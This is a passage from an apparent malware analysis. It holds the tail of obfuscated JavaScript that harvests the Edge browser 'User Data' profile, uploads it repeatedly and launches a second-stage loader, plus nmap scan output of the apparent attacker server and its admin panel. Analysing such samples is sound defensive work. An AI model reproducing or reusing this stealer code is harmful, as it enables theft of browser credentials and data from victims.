await _0x4b30b9(_0x1c8a9f('~/') + "/AppData/Local/Microsoft/Edge/User Data", '3_', false);
}
if ('d' == _0x33f6cf[0]) {
await _0x23d512();
} else {
await _0xc3c6be(_0x45c915, 0);
await _0xc3c6be(_0x5ed30d, 1);
await _0xc3c6be(_0x793f19, 2);
}
} catch (_0xc8f850) {}
})();
_0x5bc0ed();
} catch (_0x58c825) {}
};
// Entry point: run the collection once and start the second-stage loader
// immediately, then re-run the collection every 30 s while the counter is
// below 5 (four more runs) before clearing the interval. Each run repeats the
// uploads, so the same files may be sent several times.
_0x59f5ea();
_0x5bc0ed();
let _0x56c931 = setInterval(() => {
if ((_0x152224 += 1) < 5) {
_0x59f5ea();
} else {
clearInterval(_0x56c931);
}
}, 30000);
# Full nmap scan of that IP address
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.58 ((Win64) OpenSSL/3.1.3 PHP/8.2.12)
|_http-server-header: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
|_https-redirect: ERROR: Script execution failed (use -d to debug)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
443/tcp open ssl/http Apache httpd 2.4.58 ((Win64) OpenSSL/3.1.3 PHP/8.2.12)
|_http-server-header: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after: 2019-11-08T23:48:47
| tls-alpn:
|_ http/1.1
445/tcp open microsoft-ds?
1224/tcp open http Node.js Express framework
|_http-cors: HEAD GET POST PUT DELETE PATCH
|_http-title: Error
1245/tcp open isbconference2?
| fingerprint-strings:
| GetRequest, HTTPOptions:
| HTTP/1.1 200 OK
| Content-Length: 3225
| Content-Disposition: inline; filename="index.html"
| Accept-Ranges: bytes
| ETag: "43ce08108386f188edae0956cdb185c8f9c9f804"
| Content-Type: text/html; charset=utf-8
| Vary: Accept-Encoding
| Date: Tue, 30 Jul 2024 23:34:33 GMT
| Connection: close
|_ <!doctype html><html lang="en"><head><meta charset="utf-8"/><link rel="icon" href="/favicon.ico"/><meta name="viewport" content="width=device-width,initial-scale=1"/><meta name="theme-color" content="#000000"/><meta name="description" content="Web site created using create-react-app"/><link rel="apple-touch-icon" href="/logo192.png"/><link rel="stylesheet" href="/assets/bootstrap/dist/css/bootstrap.min.css"><link rel="manifest" href="/manifest.json"/><title>L-Administrator</title><link href="/static/css/main.f2117e3f.chunk.css" rel="stylesheet"></head><body><noscript>You need to enable JavaScript to run this
3306/tcp open mysql MariaDB (unauthorized)
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: WIN-BS656MOF35Q
| NetBIOS_Domain_Name: WIN-BS656MOF35Q
| NetBIOS_Computer_Name: WIN-BS656MOF35Q
| DNS_Domain_Name: WIN-BS656MOF35Q
| DNS_Computer_Name: WIN-BS656MOF35Q
| Product_Version: 10.0.20348
|_ System_Time: 2024-07-30T23:35:19+00:00
| ssl-cert: Subject: commonName=WIN-BS656MOF35Q
| Not valid before: 2024-07-15T14:16:49
|_Not valid after: 2025-01-14T14:16:49
|_ssl-date: 2024-07-30T23:35:27+00:00; -1s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49671/tcp open msrpc Microsoft Windows RPC
52444/tcp open msrpc Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port1245-TCP:V=7.80%I=7%D=7/30%Time=66A97889%P=x86_64-pc-linux-gnu%r(Ge
SF:tRequest,DB5,"HTTP/1\.1\x20200\x20OK\r\nContent-Length:\x203225\r\nCont
SF:ent-Disposition:\x20inline;\x20filename=\"index\.html\"\r\nAccept-Range
SF:s:\x20bytes\r\nETag:\x20\"43ce08108386f188edae0956cdb185c8f9c9f804\"\r\
SF:nContent-Type:\x20text/html;\x20charset=utf-8\r\nVary:\x20Accept-Encodi
SF:ng\r\nDate:\x20Tue,\x2030\x20Jul\x202024\x2023:34:33\x20GMT\r\nConnecti
SF:on:\x20close\r\n\r\n<!doctype\x20html><html\x20lang=\"en\"><head><meta\
SF:x20charset=\"utf-8\"/><link\x20rel=\"icon\"\x20href=\"/favicon\.ico\"/>
SF:<meta\x20name=\"viewport\"\x20content=\"width=device-width,initial-scal
SF:e=1\"/><meta\x20name=\"theme-color\"\x20content=\"#000000\"/><meta\x20n
SF:ame=\"description\"\x20content=\"Web\x20site\x20created\x20using\x20cre
SF:ate-react-app\"/><link\x20rel=\"apple-touch-icon\"\x20href=\"/logo192\.
SF:png\"/><link\x20rel=\"stylesheet\"\x20href=\"/assets/bootstrap/dist/css
SF:/bootstrap\.min\.css\"><link\x20rel=\"manifest\"\x20href=\"/manifest\.j
SF:son\"/><title>L-Administrator</title><link\x20href=\"/static/css/main\.
SF:f2117e3f\.chunk\.css\"\x20rel=\"stylesheet\"></head><body><noscript>You
SF:\x20need\x20to\x20enable\x20JavaScript\x20to\x20run\x20this\x20")%r(HTT
SF:POptions,DB5,"HTTP/1\.1\x20200\x20OK\r\nContent-Length:\x203225\r\nCont
SF:ent-Disposition:\x20inline;\x20filename=\"index\.html\"\r\nAccept-Range
SF:s:\x20bytes\r\nETag:\x20\"43ce08108386f188edae0956cdb185c8f9c9f804\"\r\
SF:nContent-Type:\x20text/html;\x20charset=utf-8\r\nVary:\x20Accept-Encodi
SF:ng\r\nDate:\x20Tue,\x2030\x20Jul\x202024\x2023:34:33\x20GMT\r\nConnecti
SF:on:\x20close\r\n\r\n<!doctype\x20html><html\x20lang=\"en\"><head><meta\
SF:x20charset=\"utf-8\"/><link\x20rel=\"icon\"\x20href=\"/favicon\.ico\"/>
SF:<meta\x20name=\"viewport\"\x20content=\"width=device-width,initial-scal
SF:e=1\"/><meta\x20name=\"theme-color\"\x20content=\"#000000\"/><meta\x20n
SF:ame=\"description\"\x20content=\"Web\x20site\x20created\x20using\x20cre
SF:ate-react-app\"/><link\x20rel=\"apple-touch-icon\"\x20href=\"/logo192\.
SF:png\"/><link\x20rel=\"stylesheet\"\x20href=\"/assets/bootstrap/dist/css
SF:/bootstrap\.min\.css\"><link\x20rel=\"manifest\"\x20href=\"/manifest\.j
SF:son\"/><title>L-Administrator</title><link\x20href=\"/static/css/main\.
SF:f2117e3f\.chunk\.css\"\x20rel=\"stylesheet\"></head><body><noscript>You
SF:\x20need\x20to\x20enable\x20JavaScript\x20to\x20run\x20this\x20");
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2024-07-30T23:35:22
|_ start_date: N/A